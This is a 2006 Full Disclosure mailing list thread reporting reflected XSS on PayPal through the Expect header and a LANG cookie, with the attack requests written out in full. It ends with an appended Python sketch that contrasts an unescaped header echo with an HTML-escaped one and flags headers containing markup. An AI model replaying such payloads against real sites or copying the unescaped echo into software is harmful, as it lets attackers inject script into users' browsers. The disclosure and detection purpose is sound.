Full Disclosure mailing list archives
Re: [x0n3-h4ck.org] PayPal vulnerable to XSS
From: "Debasis Mohanty" <debasis.mohanty.listmails () gmail com>
Date: Tue, 7 Nov 2006 07:55:06 -0800
I found a similar one long back in the "Expect" header but did not bother to post... However, this bug is not associated with the PayPal application but rather with the Apache server *version* on which it is hosted. This kind of XSS is usually called "Unfiltered Header Injection in Apache". Check this -
http://www.securityfocus.com/archive/1/433280

And here is mine. Look for the injection in the "Expect" header -

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.paypal.com
Cookie: <some_cookie_value> cookie_check=yes;feel_cookie=-=your_favorite_cookie=-;
Connection: Close
Expect: <script>alert(whatever_you_like)</script>
Pragma: no-cache

Regards,
-d

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Andrew Farmer
Sent: Monday, November 06, 2006 12:45 PM
To: corrado.liotta () alice it
Cc: full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] [x0n3-h4ck.org] PayPal vulnerable to XSS

On 04 Nov 06, at 11:39, <corrado.liotta () alice it> <corrado.liotta () alice it> wrote:
this is a request, that I have passed server to the web, complete of the code that would allow the xss:

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.paypal.com
Cookie: cookie_check=yes;feel_cookie=
<snip big session cookies>
LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>
<snip more cookies>
Connection: Close
Pragma: no-cache

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
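
Added example, not part of the original thread and not Apache's or PayPal's code: a sketch of the server-side behaviour the message describes, an error page that echoes the Expect header, with the unescaped form beside the HTML-escaped form, plus a check that flags request headers carrying markup. The function names, the error-page wording and the host www.example.test are assumptions; the sample request is constructed from the two requests quoted above.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample request, modelled on the requests quoted in the thread.
SAMPLE_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "Accept: */*\r\n"
    "Host: www.example.test\r\n"
    "Cookie: cookie_check=yes; LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>\r\n"
    "Expect: <script>alert(1)</script>\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
)

ANGLE_BRACKETS = re.compile(r"[<>]")

def parse_headers(raw):
    """Return (name, value) pairs from the header block of a raw HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs

def error_page_unescaped(expect):
    """The defect: a request header value is copied into HTML as-is."""
    return "<p>Expectation failed: %s</p>" % expect

def error_page_escaped(expect):
    """The fix: HTML-encode every request-derived value before it reaches the page."""
    return "<p>Expectation failed: %s</p>" % html.escape(expect, quote=True)

def headers_with_markup(raw):
    """Detection: names of headers whose percent-decoded value contains < or >."""
    return [n for n, v in parse_headers(raw) if ANGLE_BRACKETS.search(unquote(v))]

if __name__ == "__main__":
    expect = dict(parse_headers(SAMPLE_REQUEST))["Expect"]
    print("flagged headers:", headers_with_markup(SAMPLE_REQUEST))
    print("unescaped:", error_page_unescaped(expect))
    print("escaped:  ", error_page_escaped(expect))
```

The same check can be run over logged request headers; Expect values in normal traffic are tokens such as 100-continue and never contain angle brackets.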